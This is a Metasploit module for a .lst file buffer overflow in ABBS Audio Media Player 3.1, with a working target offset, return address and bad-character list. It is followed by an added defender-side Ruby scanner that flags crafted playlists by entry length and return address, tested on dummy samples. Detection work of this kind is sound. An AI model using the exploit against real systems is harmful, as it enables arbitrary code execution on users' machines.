GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/abbs_amp_lst.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
        occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
        of the user running the application. This module has been tested successfully on
        ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julian Ahrens', # Vulnerability discovery and PoC
          'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '75096' ],
          [ 'EDB', '25204' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00\x0a\x0d",
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'    => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
              'Offset' => 4108,
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-06-30',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
      ])

  end

  def exploit
    buffer = payload.encoded
    buffer << rand_text(target['Offset'] - (payload.encoded.length))
    buffer << [target.ret].pack('V')

    file_create(buffer)
  end
end
```
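The module's `exploit` method lays the file out as payload, random padding up to `target['Offset']` (4108 bytes), then `target.ret` packed little-endian. The following defender-side scanner, an added example that is not part of the Metasploit module or of the framework, turns that layout into two detection indicators for a `.lst` file: an entry at least 4108 bytes long, and the packed amp.exe return address `0x00412c91` sitting at or past that offset. The function names (`longest_entry`, `ret_offset`, `scan_lst`) and the sample playlists are constructed for this example.

```ruby
VULN_OFFSET = 4108                    # target['Offset'] from the module above
RET_ADDR    = [0x00412c91].pack('V')  # target['Ret'], packed the way exploit() does

# Longest playlist entry in bytes. The module's bad chars exclude \x0a and
# \x0d, so the crafted buffer is written as a single line, while legitimate
# entries are file paths far shorter than the 4108-byte boundary.
def longest_entry(data)
  data.b.each_line.map { |line| line.chomp.bytesize }.max || 0
end

# Byte offset of the packed amp.exe return address, or nil when absent.
# exploit() appends it after exactly 4108 bytes of payload plus padding.
def ret_offset(data)
  data.b.index(RET_ADDR)
end

# Indicators for one file body:
#   :longest => longest entry length in bytes
#   :ret_at  => offset of the return address, or nil
#   :verdict => :crafted when both indicators line up with the module's
#               layout, :oversized when only the length trips, :clean otherwise
def scan_lst(data)
  longest = longest_entry(data)
  ret_at  = ret_offset(data)
  verdict =
    if longest >= VULN_OFFSET && ret_at && ret_at >= VULN_OFFSET
      :crafted
    elsif longest >= VULN_OFFSET
      :oversized
    else
      :clean
    end
  { longest: longest, ret_at: ret_at, verdict: verdict }
end

# Constructed samples (no real payload): a benign playlist, and a file laid
# out like exploit()'s buffer with 'A's standing in for payload.encoded and
# 'B's for the rand_text() padding.
BENIGN_LST  = "C:\\music\\track01.mp3\r\nC:\\music\\track02.mp3\r\n"
CRAFTED_LST = ("A" * 300) + ("B" * (VULN_OFFSET - 300)) + RET_ADDR

if __FILE__ == $PROGRAM_NAME
  [BENIGN_LST, CRAFTED_LST].each { |body| p scan_lst(body) }
end
```

The length indicator alone catches any oversized entry, including variants that use a different return address; the address match is what ties a hit to this particular module's layout.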